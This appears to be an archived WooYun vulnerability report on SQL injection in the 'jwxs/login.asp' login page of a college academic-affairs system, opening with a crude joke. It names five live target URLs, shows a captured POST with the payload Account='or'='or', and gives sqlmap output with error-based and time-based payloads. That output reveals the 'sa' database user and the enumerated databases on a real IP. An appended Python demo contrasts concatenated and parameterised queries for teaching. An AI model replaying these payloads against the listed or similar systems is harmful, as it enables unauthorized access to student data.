### Brief description:

Man: "Ask the world, what is love..." Woman: a big slap across the face, smack! "Fuck off, a programmer still wants a girlfriend? Serves you right to die on your code."

### Details:

As WooYun requires, five cases!

```
http://jwxt.hifa.edu.cn/jiaowu/jwxs/login.asp
http://221.232.159.24/dhjw/jwxs/login.asp
http://jiaowu.hustwenhua.net/jwxs/login.asp
http://xscx.cmcedu.cn/jwxs/login.asp
http://jwxt.hycgy.com:5000/jwxs/login.asp
```

Capture the request when logging in:

![QQ截图20150323134521.png](https://images.seebug.org/upload/201503/23134131b0f9417332aaf2facd5751138e58292a.png)

![2.png](https://images.seebug.org/upload/201503/231341522349117bd2b5164406c21be381e89242.png)

```
POST /dhjw/jwxs/login.asp HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://221.232.159.24/dhjw/jwxs/login.asp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 221.232.159.24
Content-Length: 108
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: LoginLb=; ASPSESSIONIDCSACRCTD=MMHJDOJDHFEIOOCPPELOLJME

datetime=2015-3-23+13%3A12%3A50&loginNum=&Account=%27or%27%3D%27or%27&Password=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1
```

![1.png](https://images.seebug.org/upload/201503/23134257049f1fe51cb24b085eb4a35f8897616e.png)

![123.png](https://images.seebug.org/upload/201503/2313440159ab6f8528b8f3f0031052af6310006e.png)

```
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: Account
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: datetime=2015-3-23 13:12:50&loginNum=&Account=-2532' OR 7256=CONVERT(INT,(SELECT CHAR(113) CHAR(106) CHAR(112) CHAR(122) CHAR(113) (SELECT (CASE WHEN (7256=7256) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(118) CHAR(113) CHAR(113))) AND 'ogOj'='ogOj&Password=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: datetime=2015-3-23 13:12:50&loginNum=&Account=-4128' OR 4975=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'QvyA'='QvyA&Password=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1
---
[13:47:47] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[13:47:47] [INFO] fetching current user
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] Y
[13:47:49] [INFO] retrieved: sa
current user:    'sa'
[13:47:49] [INFO] fetching current database
[13:47:49] [INFO] retrieved: dhjw
current database:    'dhjw'
[13:47:49] [INFO] fetching database names
[13:47:49] [WARNING] reflective value(s) found and filtering out
[13:47:49] [WARNING] the SQL query provided does not return any output
[13:47:49] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[13:47:49] [INFO] fetching number of databases
[13:47:49] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[13:47:51] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
[13:47:52] [ERROR] unable to retrieve the number of databases
[13:47:52] [INFO] retrieved: dhjw
[13:47:52] [INFO] retrieved: master
[13:47:52] [INFO] retrieved: tempdb
[13:47:53] [INFO] retrieved: model
[13:47:53] [INFO] retrieved: msdb
[13:47:53] [INFO] retrieved: ReportServer
[13:47:53] [INFO] retrieved: ReportServerTempDB
[13:47:53] [INFO] retrieved: dhjw
[13:47:54] [INFO] retrieved:
available databases [7]:
[*] dhjw
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb

[13:47:54] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 23 times
[13:47:54] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\output\221.232.159.24'

[*] shutting down at 13:47:54
```

### Proof of vulnerability:

![123.png](https://images.seebug.org/upload/201503/2313440159ab6f8528b8f3f0031052af6310006e.png)
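To show why the quote in `Account=%27or%27%3D%27or%27` reaches the database as SQL rather than as data, here is an added Python model (not code from the report or from the jwxs system) of a concatenated login query beside its parameterised form. The table `jwxs_user`, its row and the query shape are assumptions, and SQLite stands in for SQL Server; SQL Server, unlike SQLite, rejects the stray `'='` literal as a non-boolean condition and returns a server error instead of a row.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed sample: the form body captured from login.asp in the report
# (Account=%27or%27%3D%27or%27 decodes to the string 'or'='or').
CAPTURED_BODY = ("datetime=2015-3-23+13%3A12%3A50&loginNum=&Account=%27or%27%3D%27or%27"
                 "&Password=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1")

def form_field(body, name):
    # Decode one field exactly as the ASP page would receive it (blank fields kept).
    return parse_qs(body, keep_blank_values=True)[name][0]

def setup_db():
    # Stand-in for the jwxs user table; table name, columns and the row are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE jwxs_user (Account TEXT, Password TEXT)")
    db.execute("INSERT INTO jwxs_user VALUES ('2015001', 'l')")
    return db

def concat_query(account, password):
    # Assumed shape of the vulnerable classic-ASP statement: input pasted into SQL text.
    return f"SELECT Account FROM jwxs_user WHERE Account='{account}' AND Password='{password}'"

def string_literals(sql):
    # Pull out the SQL string literals; a correctly built login query has exactly two.
    return re.findall(r"'(?:[^']|'')*'", sql)

def login_concat(db, account, password):
    return db.execute(concat_query(account, password)).fetchall()

def login_param(db, account, password):
    # Hardened form: placeholders send the input as data, never through the SQL parser.
    sql = "SELECT Account FROM jwxs_user WHERE Account=? AND Password=?"
    return db.execute(sql, (account, password)).fetchall()

def demo():
    db = setup_db()
    account = form_field(CAPTURED_BODY, "Account")    # "'or'='or'"
    password = form_field(CAPTURED_BODY, "Password")  # "l"
    return {
        "account": account,
        # 4 literals: '' then '=' then '' then 'l', so the input rewrote the WHERE clause
        "literals_concat": len(string_literals(concat_query(account, password))),
        "literals_benign": len(string_literals(concat_query("2015001", "l"))),  # 2
        "concat_rows": login_concat(db, account, password),  # [] in SQLite; an error on SQL Server
        "param_rows": login_param(db, account, password),    # []: the whole string is one value
        "param_ok": login_param(db, "2015001", "l"),         # [('2015001',)]
    }

if __name__ == "__main__":
    print(demo())
```

The literal count is the tell: the parameterised query never changes shape no matter what the Account field contains, while the concatenated one grows from two literals to four with the report's payload.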